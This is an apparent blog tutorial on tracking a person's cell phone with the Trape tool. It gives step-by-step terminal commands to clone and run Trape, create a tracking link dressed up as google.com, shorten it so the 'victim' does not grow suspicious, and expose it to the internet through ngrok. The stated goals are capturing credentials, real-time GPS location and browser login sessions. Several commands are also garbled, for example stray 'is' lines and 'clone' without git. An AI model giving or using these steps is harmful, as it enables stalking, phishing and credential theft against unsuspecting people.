How to trace a cell phone without IP address?
How we can do?
In this blog, we are gonna TRACK any cell phone easily using a simple tool called "Trape" and a little social engineering trick.
Using Trape we can generate a tracking URL for the victim. If the victim enters the URL, we will get the IP logs in Trape's control panel.
What we can do?
Once the victim trapped:
- We can capture credentials, important details, etc.
- We can get the real-time location too if the GPS is turned on.
- We can check the login sessions of the browsers that the victim used.
Let's Start...!
Step 1:
Fire up your terminal and type the following command:
cd Desktop/git
clone https://github.com/jofpin/trape.git
Step 2:
Now go to the download folder by the commands
cd Desktop
is
cd Trape/
is
Step 3:
Install the necessary packages
pip install -r requirements.txt
Step 4:
Now, run the command python trape.py -h to see how to use the tool.
Here, we are using the URL https://google.com and Port 8080 as an example. So our command will look like this-
python trape.py -u https://google.com -p 8080
Step 5:
Here we got two links and one access key. The first link is to trape the victim, the second is the control panel link and the access key is to access the control panel.
Tip:
Shorten the above URL with any link shortener, so that the victim doesn't get suspicious.
Also read: Some Useful PC Tricks you should know...
Note:
The IP address 127.0.0.1 which is used in the generated link is a local IP address. It will only work on the devices connected to the same local network.
But don't worry. NgRok tool can help us in this situation.
Step 6:
Download and extract NgRok on the desktop and copy the Ngrok executable file to the Desktop. Now open up the terminal to change the directory, type:
cd Desktop
is
Step 7:
We need to set up the NgRok script. Type the command:
chmod +x ngrok
mv ngrok /usr/bin
Now clear the terminal and simply type the command ngrok HTTP 8080 and hit enter.
Step 8:
Now, copy the control panel link and paste & search in a browser. You will be logged in to the Control Panel Dashboard. Here you can manage the trapped victims.
Also read: Does a VPN Protect you from Hackers?



